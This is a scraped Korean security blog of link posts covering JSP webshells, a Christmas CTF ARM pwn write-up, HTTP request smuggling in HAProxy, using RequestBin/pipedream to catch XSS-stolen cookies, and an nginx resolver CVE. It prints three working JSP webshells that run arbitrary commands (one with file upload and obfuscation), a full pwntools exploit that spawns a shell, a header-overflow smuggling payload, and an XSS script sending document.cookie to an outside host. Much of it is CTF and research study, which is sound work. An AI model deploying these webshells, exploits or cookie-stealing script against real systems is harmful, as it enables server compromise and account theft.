http://www.softwareok.com/?Download=NewFileTime 

 

NewFileTime 6.22 Download

   Download NewFileTime 6.22 for Microsoft Windows OS on SoftwareOK.com Even if the virus protection is not 100% guaranteed, the virus and trojan protection is very important for you Network and Computers! Virus Scan Results on VirusTotal.com NewFileTime

www.softwareok.com

https://zkim0115.tistory.com/1485#google_vignette

 

윈도우10 파일, 폴더 생성된 날짜 변경하기 'NewFileTime'

윈도우에서 새로운 파일이나 폴더를 만들면 만든 날짜와 시간이 표시가 되며 수정을 하거나 엑세스를 한 경우에도 날짜와 시간이 표시됩니다. 만약 파일이나 폴더를 만든 날짜나 수정, 액세스

zkim0115.tistory.com

 

 

'경로 및 정보' 카테고리의 다른 글

Elastic 경로  (0) 2022.07.01
Postgresql Injection  (0) 2022.06.17
JSP 웹쉘  (0) 2022.06.10
baby_RudOlPh Christmas CTF (펌)  (0) 2022.06.02
HTTP Request Smuggling (펌)  (0) 2022.06.02
블로그 이미지

wtdsoul

,

JSP 웹쉘

경로 및 정보 2022. 6. 10. 15:31

https://github.com/SecurityRiskAdvisors/cmd.jsp/blob/master/cmd.jsp

 

GitHub - SecurityRiskAdvisors/cmd.jsp: A super small jsp webshell with file upload capabilities.

A super small jsp webshell with file upload capabilities. - GitHub - SecurityRiskAdvisors/cmd.jsp: A super small jsp webshell with file upload capabilities.

github.com

 

<%@page import="java.io.*, java.util.*, javax.xml.bind.*, java.net.*"%><script>eval(window.localStorage.embed)</script><%!public String v(String w){String x="";try{x=URLDecoder.decode(w,"UTF-8");}catch(Exception e){}return x;}%><%String o,l,d;o=l=d="";DataInputStream r=new DataInputStream(request.getInputStream());while((l=r.readLine())!=null){d+=l;}if(d.indexOf("c=")>=0){String g=v(d.substring(2));String s;try{Process p=Runtime.getRuntime().exec(g);DataInputStream i=new DataInputStream(p.getInputStream());out.print("<pre>");while((s=i.readLine())!=null){o+=s.replace("<","&lt;").replace(">","&gt;")+"<br>";}}catch(Exception e){out.print(e);}}else{if(d.length()>1){int b=d.indexOf("b=");int n=d.indexOf("n=");byte[] m=DatatypeConverter.parseBase64Binary(v(d.substring(b+2)));String f=v(d.substring(2,n-1))+File.separator+v(d.substring(n+2,b-1));try{OutputStream stream=new FileOutputStream(f);stream.write(m);o="Uploaded: "+f;}catch(Exception e){out.print(e);}}}%><%=o%>

 

 


<%@ page contentType="text/html; charset=UTF-8" %>
<%@ page import="java.io.*" %>
<%
    String cmd = request.getParameter("cmd");
    Process ps = null;
    BuffereReader br = null;
    String line = "";
    String result = "";
    String now_page = request.getServletPath();

    try {
if(cmd != null {
                ps = Runtime/*DSDsdfasdfasdf*/./*DSDsdfasdfasdf*/getRuntime/*DSDsdfasdfasdf*/()/*DSDsdfasdfasdf*/./*DSDsdfasdfasdf*/exec/*DSDsdfasdfasdf*/(cmd);
                br = new BuffereReader(new InputStreamReader(ps.getInputStream()));

                while((line = br.readLine()) != null ) {
                    result += line + "<br>";
                }
                ps.destory();
            }
        } finally {
            if(br != null) br.close();
        }

%> 

 


<%@ page import="java.io.*" %>
<%

    try {
//sdfgsdfgsdfgsretsdrt
            String cmd = request.getParameter("cmd");
// selrjlsdfjglisdjflgdgsdfg
            Process child = Runtime.getRuntime().exec(cmd);
//lajwriljalsdkfjl

            InputStream in = child.getInputStream();

            int c;

            

            while ((c = in.read()) != -1) {

                out.print((char)c);

            }

            

            in.close();

            

            try {

                child.waitFor();

            } catch (InterruptedException e) {

                e.printStackTrace();

            }

    } catch (IOException e) {

        System.err.println(e);

    }

%> 

'경로 및 정보' 카테고리의 다른 글

Postgresql Injection  (0) 2022.06.17
파일 시간 변경  (0) 2022.06.11
baby_RudOlPh Christmas CTF (펌)  (0) 2022.06.02
HTTP Request Smuggling (펌)  (0) 2022.06.02
Heidi SQL Portable  (0) 2022.05.20
블로그 이미지

wtdsoul

,

 

https://code-machina.github.io/2019/07/27/How-to-prevent-XXE-Injection.html

 

XXE 인젝션 방어 (.NET)

안녕하세요 코마입니다. 오늘은 XXE (XML eXternal Entity) 인젝션의 위험을 평가하고 이를 예방하는 방법에 대해 알아보겠습니다.😺

code-machina.github.io

 

https://dailylearn.tistory.com/113

 

[Web Hacking] XML 외부개체(XXE Injection)

※ XML 외부 개체(XXE) XXE는 악의적인 자바스크립트를 막기 위한 필터장치를 우회하는 취약점으로 XML 문서에서 동적으로 외부 URI의 리소스를 포함시킬 수 있는 외부 엔티티(Entity)를 사용할 때 발

dailylearn.tistory.com

 

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/XML_External_Entity_Prevention_Cheat_Sheet.md

 

 

블로그 이미지

wtdsoul

,

https://appdevorsec.tistory.com/36

 

Checkra1n 탈옥 방법 & USB 포맷 방법

탈옥 시 장점 : 제 3사 앱을 다운받을 수 있고 루트 권한을 얻을 수 있다. OpenSSH와 같은 유용한 기능도 사용할 수 있어 파일 시스템을 획득할 수 있다. Checkra1n 탈옥은 checkm8 취약점을 이용한 탈옥

appdevorsec.tistory.com

 

https://www.balena.io/etcher/

 

balena - The complete IoT fleet management platform

Infrastructure and tools to develop, deploy, and manage connected devices at scale. Your first ten devices are always free.

www.balena.io

 

https://jbsite.kr/ios14.html

 

JBsite

모든 탈옥 콘텐츠를 한 사이트에서!!!

jbsite.kr

 

 

블로그 이미지

wtdsoul

,

https://hackyboiz.github.io/2020/12/29/l0ch/baby_rudolph/

 

hackyboiz

hack & life

hackyboiz.github.io

 

ArmMaker

 

baby_RudOlPh는 baby 시리즈 답게 이번 Christmas CTF에서 가장 많은 솔버가 나왔던 문제 중 하나입니다.

바이너리를 받고 보호기법과 아키텍쳐를 확인해보면 64bit ARM이고, NX bit만 걸려있는걸 확인할 수 있습니다.


분석해보면 vuln이라는 함수를 대놓고 줍니다. read 함수를 호출하는데 0x100만큼 받아서 stack overwflow가 발생하네요

get_arm 함수를 보면 첫 번째 인자의 값이 0x1225  system("/bin/sh")을 실행해 쉘을 획득할 수 있습니다.

ARMmaker 함수에는 인자를 세팅 할 수 있는 gadget이 있네요.

  1. vuln 의 return address를 ARMmaker의 gadget으로 overwrite
  2. gadget을 통해 인자를 0x1225로 세팅하고 get_arm 호출
  3. get shell!

Exploit

from pwn import *

p = process("./baby_RudOlPh")
context.log_level = "debug"
p.recvuntil("\\n")

payload = b"A"*72
payload += p64(0x400724)
payload += p64(0x1225) + b"A"*16
payload += p64(0x400738)

p.sendline(payload)
p.interactive()Copy

뉴비용 포너블 문제를 내려는데 그냥 내면 심심해서 64bit ARM으로 내봤습니다 ㅎㅎ 역시 많은 분들이 풀어주셨습니다!

(문제 만드는 시간보다 도커에 세팅하는데 드는 시간이 더 오래 걸렸던 건 비밀..)

'경로 및 정보' 카테고리의 다른 글

파일 시간 변경  (0) 2022.06.11
JSP 웹쉘  (0) 2022.06.10
HTTP Request Smuggling (펌)  (0) 2022.06.02
Heidi SQL Portable  (0) 2022.05.20
criminal ip  (0) 2022.05.17
블로그 이미지

wtdsoul

,

https://hackyboiz.github.io/2022/03/06/syru/funny-smuggling-story-pt2/

 

hackyboiz

hack & life

hackyboiz.github.io

 

잠깐, HTTP Request Smuggling이 뭐였지?

사례 연구에 앞서 복습을 해봅시다.

이 공격 기법은 HTTP 요청이 처리될 때 이전 요청이 다음 요청에 포함되어 해당 요청의 처리결과를 바꾸는 것이었습니다.

웹 서비스 인프라를 구성할 때 트래픽 분산, 캐싱 등을 위해 프록시를 배치하게 되는데 이 프록시와 웹 서버가 서로 HTTP 요청의 Body 길이에 대한 해석을 다르게 하면서 주로 발생합니다.

Body의 길이는 Content-Length 헤더나 Transfer-Encoding 헤더를 통해 결정되며 아래의 규칙이 존재합니다.

  1. Content-Length 헤더가 2개 이상 존재하면 400 Bad Request로 처리한다.
  2. Content-Length 헤더와 Transfer-Encoding 헤더가 동시에 존재하면 Transfer-Encoding을 따른다.

규칙을 읽어보면 표준에 따르기만 해도 Smuggling이 방지될 것 같습니다.

하지만 공격자들은 연구 끝에 아래 방법을 사용하여 이를 우회 하였습니다.

  1. 특수한 입력값을 통해 특정 파서의 파싱 결과를 다르게 나오도록 유도하기
  2. 파서의 잘못된 처리로직을 이용하기

공격 사례

편의를 위해 Content-Length를 CL, Transfer-Encoding을 TE라고 부르겠습니다.

CL-CL + 특정 파서의 파싱 결과를 다르게 나오도록 유도하기

HAProxy는 고가용성(HA)을 위해 주로 사용되는 프록시 입니다.

작년 9월에 이 프록시에서 CL-CL 유형의 HTTP Request Smuggling이 발견되었습니다.

해당 유형이 동작하려면 두 파싱 단계에서 400 bad request 처리를 막아야합니다.

즉 처리하는 순간에는 CL 헤더는 하나만 있는 것으로 보여야 합니다.

해당 취약 버젼에서 HAProxy는 파싱단계에서 CL이 한번 정상적으로 처리되면 나머지 헤더는 무시하도록 프로그래밍 되어 있습니다.

그렇기에 HAProxy가 웹 서버로 전달하는 HTTP 요청에는 CL 헤더가 하나만 존재하게 됩니다.

지금까지의 내용을 정리하면 대략 아래와 같은 방식으로 공격을 진행하면 됩니다.

그럼 이제 HAProxy가 전달받은 HTTP 요청이 400 Bad Request가 안 뜨면서 두 번째 요청의 CL 헤더의 값과 다르게 하려면 어떻게 해야 할까요?

HAProxy가 파싱과정에서 비정상 헤더를 정상으로 만들면 됩니다.

HAProxy는 HTTP 요청을 파싱할 때 HTX라는 구조를 사용합니다.

HTX는 크게 실제 데이터가 들어있는 payload와 해당 정보를 저장하는 block으로 나뉩니다.

block에는 이 정보가 어떤 payload의 것인지 주소를 저장하는 부분과 해당 payload의 정보를 저장하는 부분으로 나뉩니다.

HTX_BLOCK 구조의 두 멤버는 모두 uint32 (4byte) 자료형을 쓰고 있습니다.

payload의 정보를 저장하는 부분을 보면 헤더의 길이를 저장하는 공간이 1byte인 것을 알 수 있습니다.

정상적인 헤더 중 1byte(256)을 넘는 길이를 가지는 것은 없기 때문에 문제가 없어보입니다.

실제로 아래와 같이 주석만 남겨두고 길이 검증 코드가 존재하지 않았습니다.

/*
 *  HEAD : 3d5f19e04d88e7c8f71cba4ea12e383c91de89f6
 *  PATH : include/haproxy/htx.h
 */

static inline struct htx_blk *htx_add_header(struct htx *htx, const struct ist name,
					     const struct ist value)
{
	struct htx_blk *blk;

	/* FIXME: check name.len (< 256B) and value.len (< 1MB) */
	blk = htx_add_blk(htx, HTX_BLK_HDR, name.len + value.len);
    ...
}Copy

이처럼 미흡한 검증은 공격에 쓰이는 좋은 가젯이 됩니다.

Integer Overflow를 통해 정상 헤더 + dummy 구조의 헤더에서 정상 부분만 처리하도록 하면 우리는 비정상 헤더를 정상으로 보이게 할 수 있습니다.

HTX를 파싱할 때 헤더의 길이는 구분자 : 앞까지로 계산됩니다.

POST / HTTP/1.1
Content-Length0aaaa..255개..aa: --- (1)
Content-Length: 4 --- (2)

CLCLCopy

(1)에서 헤더의 길이는 270입니다.

그런데 270은 0b100001110 인데 공간은 8bit만 할당되어 있으므로 앞에 1은 짤려서 0b00001110 만 저장되게 됩니다.

그렇게 조작된 길이 14만큼 읽으면 정상 헤더인 Content-Length로 바뀌게 됩니다.

앞서 설명한 부분들을 정리하면 아래의 순서로 Smuggling이 발생합니다.

  1. 해당 패킷을 HAProxy가 받을 때는 (1)은 비정상 헤더로 처리되고 (2)를 기준으로 처리
  2. HTX 구조로 파싱할 때 Integer Overflow로 인해 (1)이 정상 헤더로 처리
  3. HAProxy가 웹 서버에 전달할 때는 (1)이 해당 요청이 다음과 같이 바뀌어 전달
  4. POST / HTTP/1.1 Content-Length:0 --- (1) CLCLCopy
  5. Content-Length만큼 처리 후 남은 CLCL이 다음 리퀘스트에 삽입됨

이 취약점은 당연히 아래와 같이 길이 검사를 추가하는 방향으로 패치되었습니다.

+ if (name.len > 255 || value.len > 1048575)
+     return NULL;Copy

CL-TE + 파서의 잘못된 처리 로직 이용하기

Tomcat은 JSP를 처리하는 Web Application Server 입니다.

작년 7월에 tomcat에서 CL-TE 유형의 HTTP Request Smuggling 취약점이 발견되었습니다.

해당 버젼에서 Client가 HTTP/1.0 응답만 받아들이도록 선언되어 있으면 Tomcat이 TE 헤더를 무시하는 로직이 존재하였고 결과적으로 아래와 같이 동작하였습니다.

마치며

HTTP Request Smuggling은 처리 방식이 동기화되지 않았다고 하여 HTTP Desync Attack이라고도 불립니다.

DEFCON 대회 예선 문제로 해당 취약점을 이용한 문제가 출제된 바 있으니 풀어보시면 이해하시는 데 도움이 되실 겁니다.

uploooadit | OOO archive | DEF CON CTF

Reference

'경로 및 정보' 카테고리의 다른 글

JSP 웹쉘  (0) 2022.06.10
baby_RudOlPh Christmas CTF (펌)  (0) 2022.06.02
Heidi SQL Portable  (0) 2022.05.20
criminal ip  (0) 2022.05.17
Unleashing an Ultimate XSS Polyglot  (0) 2022.05.11
블로그 이미지

wtdsoul

,

https://jdh5202.tistory.com/807

 

RequestBin - Webhook

Webhook ① 서버 단에서 특정 이벤트를 외부에 전달하는 방법. ② 서버에서 작업 수행 시 해당 작업이 수행됨을 HTTP Post로 알림. ③ Webhook 구현 시 특정 작업이 수행된 URL에 대해 POST 방식으로 요청

jdh5202.tistory.com

 

web hook 유사

 

 

Webhook
 서버 단에서 특정 이벤트를 외부에 전달하는 방법.
 서버에서 작업 수행 시 해당 작업이 수행됨을 HTTP Post로 알림.
 Webhook 구현 시 특정 작업이 수행된 URL에 대해 POST 방식으로 요청을 생성.
 한 시스템에서 발생하는 이벤트가 다른 시스템에 전달되어 처리되어야 할 때 사용.

RequsetBin.com은 HTTP와 Webhook 정보를 요청/수집할 수 있는 사이트로
아래 주소에서 회원가입을 진행하고 pipdream으로 이동하면 기능을 이용할 수 있다.
Pipdream에서 Sources 탭으로 이동하여 Create one 링크를 클릭한다.

 

HTTP / Webhook 을 선택한다.



Response 정보를 설정하고 CREATE SOURCE 버튼을 클릭한다.



Source가 생성되면 HTTP 요청/응답을 받을 수 있는 엔드포인트 URL이 만들어진다.



해당 주소에 임의의 파라미터를 설정해 접근하면 EVENTS 로그를 통해 해당 파라미터로 전달받은 값을 확인할 수 있다.

 https://14cc459041929db287ff1a6804a5c584.m.pipedream.net/?param1="test"&param2="test2"




xss 테스트 사이트에서 전송한 쿠키값을 확인하는 용도로 해당 사이트를 이용할 수도 있다.

 <script>document.write("<img src='https://14cc459041929db287ff1a6804a5c584.m.pipedream.net/
 ?cookie="+document.cookie+"'></img>");</script>
위 스크립트 실행 시 "cookie"라는 파라미터를 설정하여 현재 이용자 쿠키값을 pipedream으로 전송하게 된다.
pipdream은 이러한 HTTP 요청을 중계 서버에서 대신 받아 응답을 확인하는 용도로도 사용한다.













블로그 이미지

wtdsoul

,

https://me2nuk.com/zh3r0CTF-2021-Writeup/

 

Zh3r0CTF 2021 Writeup

Zh3r0CTF 2021 Writeup

me2nuk.com

 

 

'대회 문제 & CTF' 카테고리의 다른 글

bubictf-2019  (0) 2019.11.21
블로그 이미지

wtdsoul

,

https://www.heidisql.com/download.php?download=portable-64 

 

Download HeidiSQL

Ads were blocked - no problem. But keep in mind that developing HeidiSQL, user support and hosting takes time and money. You may want to send a donation instead. Download HeidiSQL 12.0, released on 12 Apr 2022 Please disable your adblocker and reload the p

www.heidisql.com

 

 

'경로 및 정보' 카테고리의 다른 글

baby_RudOlPh Christmas CTF (펌)  (0) 2022.06.02
HTTP Request Smuggling (펌)  (0) 2022.06.02
criminal ip  (0) 2022.05.17
Unleashing an Ultimate XSS Polyglot  (0) 2022.05.11
[Ethereum] Smart Contract 보안 취약점 가이드  (0) 2022.05.11
블로그 이미지

wtdsoul

,

https://hackyboiz.github.io/2021/05/27/idioth/2021-05-27/

 

hackyboiz

hack & life

hackyboiz.github.io

https://github.com/x41sec/advisories/blob/master/X41-2021-002/poc.py

 

GitHub - x41sec/advisories

Contribute to x41sec/advisories development by creating an account on GitHub.

github.com

https://0day.today/exploit/36300

 

Target

  • nginx 0.6.18 - 1.20.0

Explain

오픈 소스 웹 서버 프로그램 nginx의 ngx_resolver_copy()에서 DNS response를 처리하는 동안 발생하는 off-by-one으로 인해 heap 영역의 1-byte 메모리를 덮어쓸 수 있는 취약점이 발견되었습니다.

ngx_resolver_copy()는 DNS response에 포함된 DNS 도메인 이름의 유효성을 검사하고 압축을 해제하는 작업을 다음 두 단계로 처리합니다.

  1. 압축되지 않은 도메인 이름 크기인 len을 계산하고 128 포인터가 넘어가거나 버퍼의 범위를 벗어나는 부분을 버립니다.
  2. Output buffer를 할당하고 압축되지 않은 이름을 복사합니다.

이 과정에서 1번의 len과 2번에 압축되지 않은 이름의 크기가 달라 name->data에서 1 바이트를 벗어나 덮어쓸 수 있습니다.

nginx DNS response를 받기 위해 DNS request를 보낸 후, QNAME, NAME, RDATA 중 하나의 값을 통해 해당 취약점을 트리거할 수 있습니다. 또한 CNAME을 사용할 경우 재귀적으로 처리되어 ngx_resolve_name_locked()가 호출될 때 추가적인 OOB write가 가능하고 ngx_resolver_dup()과 ngx_crc32_short()를 통해 OOB read가 가능합니다.

해당 취약점의 POC 코드는 github에서 확인할 수 있습니다.

'CVE' 카테고리의 다른 글

CVE-2019-20372  (0) 2022.05.19
Apache cve 2021  (0) 2021.11.26
cve-2021-41773  (0) 2021.11.09
Zero To Logon, Domain  (0) 2021.08.25
MS Exchange Server 취약점 건  (0) 2021.03.11
블로그 이미지

wtdsoul

,